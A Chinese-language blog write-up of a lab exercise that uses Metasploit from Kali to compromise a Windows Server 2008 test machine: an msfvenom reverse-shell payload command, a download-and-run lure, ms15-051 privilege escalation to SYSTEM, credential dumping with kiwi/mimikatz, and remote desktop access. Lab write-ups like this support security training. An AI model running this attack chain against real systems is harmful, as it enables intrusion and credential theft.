本文首發于我的個人博客,記錄了我在實驗室學習滲透測驗所做的第三個實驗,以此文記錄,希望能對您有所幫助,
如果文章哪里有錯,請去點擊我的個人博客鏈接進行核對(可能是轉移博客時候出錯了),也可以在評論區留言告知,
前言
Metasploit
Metasploit是一款開源的滲透測驗工具,可以幫助安全員發現漏洞問題,此工具帶有的攻擊模塊可以幫助安全員簡單的利用相關的漏洞,
實驗目的
本實驗通過Metasploit對內網機器進行滲透,并且使用ms15-051進行權限提升,獲取Window Server 2008的SYSTEM權限,最后進行遠程控制,
實驗原理
Metasploit框架使Metasploit具有良好的擴展性,它的控制介面負責發現漏洞、攻擊漏洞、提交漏洞,然后通過一些介面加入攻擊后處理工具和報表工具,Metasploit框架可以從一個漏洞掃描程式匯入資料,使用關于有漏洞主機的詳細資訊來發現可攻擊漏洞,然后使用有效載荷對系統發起攻擊,所有這些操作都可以通過Metasploit的Web界面進行管理,而它只是其中一種管理介面,另外還有命令列工具和一些商業工具等,攻擊者可以將漏洞掃描程式的結果匯入到Metasploit框架的開源安全工具Armitage中,然后通過Metasploit的模塊來確定漏洞,一旦發現了漏洞,攻擊者就可以采取一種可行方法攻擊系統,通過Shell或啟動Metasploit的meterpreter來控制這個系統,這些有效載荷就是在獲得本地系統訪問后執行的一系列命令,這個程序需要參考一些檔案并使用一些資料庫技術,在發現漏洞之后開發一種可行的攻擊方法,其中有效載荷資料庫包含用于提取本地系統密碼、安裝其他軟體或控制硬體等的模塊,這些功能很象以前BO2K等工具所具備的功能,
漏洞CVE-2015-1701
受影響的系統:
- Windows Vista
- WIndows Server 2012 R2
- WIndows Server 2012
- WIndows Server 2008 R2
- WIndows Server 2008
- WIndows Server 2003
- WIndows RT 8.1
- Windows RT
- Windows 8.1
- Windows 8
- Windows 7
漏洞成因:Win32.k.sys內核模式驅動程式沒有正確處理記憶體物件,在實作上存在權限提升漏洞
漏洞危害:成功利用此漏洞可使攻擊者在內核模式中運行任意代碼,
漏洞利用:攻擊者必須具有有效的登陸憑證,并且可以本地登錄以利用此漏洞,
實驗環境
攻擊機:Kali Linux
靶機:Windows Server 2008
實驗步驟
-
使用msfvenom生成木馬
msfvenom -p windows/meterpreter/reverse_tcp lhost=攻擊機IP lport=4444 -f exe > shell.exe -
安裝xampp,并啟動,(我安裝在了/opt下)
-
把生成的木馬掛在服務器上等待靶機下載
在opt/lampp/htdocs/下創建目錄shell,提升shell及其所有檔案和子目錄的權限為所有人可讀可寫可執行,chmod命令用法,
-
把生成的木馬復制到網站目錄
-
使用msf的handler模塊
-
設定payload及其引數
payload要和木馬的payload一致(即windows/meterpreter/reverse_tcp)
-
重新啟動網站
不要關閉原來的終端,新建終端,重新啟動網站,
-
打開靶機windows server 2008,訪問
http://攻擊機IP/shell,下載木馬shell.exe(先將該網站加入受信任的站點),下載完成后,運行, -
回傳攻擊機,已成功獲取靶機的shell,getuid可查看當前權限
-
使用ms15-051漏洞,進一步獲取system更高權限
首先輸入backgroud,把會話切換進后臺,之后:
-
設定payload及其引數
-
鍵入
run以攻擊,getuid以并查看當前權限,攻擊成功,并且當前已是SYSTEM用戶,靶機的IP地址為192.168.227.130(后面要用),
-
加載kiwi,獲取用戶密碼
如果是windows server 2003,則加載mimikatz,因為我用的靶機為windows server 2008,因此需要用kiwi,其他系統你可以先加載mimikatz,根據提示選擇你要加載什么(下圖中,我最先加載的是mimikatz,它提示我應該使用kiwi來代替),
因為我沒有給用戶設定密碼,所以Password一列均為空(這里其實需要設定密碼的,后面會講到),
-
遠程連接靶機
首先在windows server 2008進行如下設定,允許運行任意版本遠程桌面的計算機連接,
然后回到攻擊機,新建一個終端,輸入
rdesktop 靶機IP,遠程連接靶機,由于rdesktop不支持無密碼登錄,因此我此時并不能使用用戶名zxy登錄,所以只能先回傳windows,在服務管理器中為用戶名為zxy的用戶設定密碼,
再次回傳攻擊機,使用rdesktop命令遠程連接主機,點擊“其他用戶”,輸入用戶名zxy和剛剛設定的密碼后,連接成功:
-
成功入侵靶機,查看IP和用戶,
至此,實驗已全部結束,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/69517.html
標籤:其他
上一篇:ms12-020死亡藍屏漏洞復現
下一篇:Redis遠程命令執行漏洞復現